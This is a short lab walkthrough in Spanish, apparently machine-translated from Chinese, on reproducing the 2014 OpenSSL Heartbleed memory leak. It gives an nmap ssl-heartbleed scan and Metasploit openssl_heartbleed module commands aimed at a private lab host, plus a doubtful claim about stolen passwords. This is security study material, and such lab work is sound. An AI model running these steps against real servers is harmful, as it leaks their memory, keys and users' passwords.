Antecedentes de vulnerabilidad
Ya en 2014, el protocolo de seguridad de Internet OpenSSL estuvo expuesto a una vulnerabilidad de seguridad muy grave. En la comunidad de hackers, se llamó "Heart Bleeding", lo que indica que hubo una "lesión interna fatal" en Internet. Con esta vulnerabilidad, los piratas informáticos pueden obtener aproximadamente el 30% de las contraseñas de las cuentas de inicio de sesión de los usuarios con URL que comienzan con https, incluidos sitios web conocidos como compras, banca en línea, redes sociales y portales.
La vulnerabilidad Heartbleed se debe a que no se realizaron correctamente las comprobaciones de límites antes de llamar al usuario víctima para que ingrese contenido como parámetro de longitud en memcpy (). El atacante puede rastrear la caché de 64 KB asignada por OpenSSL, copiar la información de bytes más allá del rango necesario en la caché y luego devolver el contenido de la caché, de modo que el contenido de la memoria de la víctima se filtre a una velocidad de 64 KB cada vez.
Verificación de vulnerabilidad
1. Sitio web en línea
在线网站:https://possible.lv/tools/hb/
2.escaneo nmap
扫描:nmap -p 443 --script ssl-heartbleed.nse 10.7.10.41
Preparación preliminar
sistema | IP |
---|---|
kali linux | 10.7.10.43 |
centos | http://10.7.10.41:443/ |
Recurrencia de lagunas
Use search heartbleed para buscar módulos.
Use module: use auxiliar / scanner / ssl / openssl_heartbleed
y luego establezca los parámetros (estableciendo detallado, de lo contrario no se mostrará información)
set rhosts 10.7.10.41
set verbose true
Entonces corre
Arreglo del fallo
Actualizar nueva versión
QQ: 3075999532
Artículo de referencia:
https://blog.csdn.net/weixin_39190897/article/details/106879383
https://www.jianshu.com/p/3a4e99862e17